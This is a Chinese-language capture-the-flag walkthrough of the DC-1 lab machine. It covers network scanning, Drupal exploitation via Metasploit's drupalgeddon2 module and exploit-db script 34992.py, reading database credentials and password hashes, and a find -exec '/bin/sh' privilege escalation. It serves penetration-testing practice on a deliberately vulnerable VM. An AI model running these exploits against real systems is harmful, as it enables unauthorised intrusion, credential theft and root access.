1.下载DC-1靶机
2.将DC-1.ova导入到VirtualBox中(具体流程不再赘述)
3.将靶机和kali(我的是在VMware下的)设置在同一网段下(具体步骤可参考此链接
4.用ifconfig
查看本机IP
5.用netdiscover -r ip/netmask
来探测靶场IP
6.经测试192.168.56.101为目标靶机ip,于是我们可以使用nmap -sV 192.168.56.101
来挖掘开放的服务信息
7.对于开放http服务的端口,可以采用"http://ip:port/"的形式访问(如下图所示)
8.通过上述操作发现仅仅是个Drupal网站,于是我们可以使用dirb http://192.168.56.101:80
来对这个服务的隐藏文件进行探测
9.发现这个robots文件后我们通过浏览器去访问一下,发现UPGRADE.txt,访问之后可以得到drupal的模糊版本信息
10.接下来我们可以使用如下命令git clone https://github.com/Dionach/CMSmap.git
安装CMSmap这个软件同时获取drupal版本(python cmsmap.py http://192.168.56.101
)
11.输入msfconsole
和search drupal
来寻找漏洞,经过多次测试后最终选定drupalgeddon2为目标
12.输入use exploit/unix/webapp/drupal_drupalgeddon2
命令后如下图所示进行设置
13.成功之后输入ls
,这时我们成功发现第一个flag,接下来我们尝试打开它,输入cat flag1.txt
14.这是在提示我们去寻找CMS配置文件,分别执行cd sites/default/
,cat settings.php
指令得到flag2,与此同时我们还得到了mysql数据库的一组用户名和密码,而且它还提醒我们暴力破解和字典攻击不是唯一的破解方法,这里应该是告诉我们不要用这两种方法
15.这里我们先尝试一下用mysql直接登录,发现没有结果显示,应该是shell的问题,于是我们可以使用python -c 'import pty; pty.spawn("/bin/bash")'
命令来获取shell外壳
16.此时再登录就顺利进去了,这时候我们再通过show databases发现了drupaldb,查看users表,使用select *from users;
命令,这时我们就得到了加密后的密码
17.破解密码是借鉴了别人的方法,另开一个msf,输入searchsploit drupal
命令,选则如图所示的攻击脚本
18.通过输入如下命令使用此脚本来增加admin权限的用户
python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.56.101 -u admin1 -p admin1
,成功登录网站并且找到flag3
19.flag3有几个明显的关键词:perms、find、passwd、-exec、shadow,我第一反应是要打开/etc/passwd看看,发现了flag4的位置了,马上cd过去并用cat打开
20.此时flag4是在提示我们去根目录看看,毫无意外,直接cd过去被拒绝了,此时再联想前面的提示,使用find来提权find ./ aaa -exec '/bin/sh' \;
,至此所有的flag都找出来了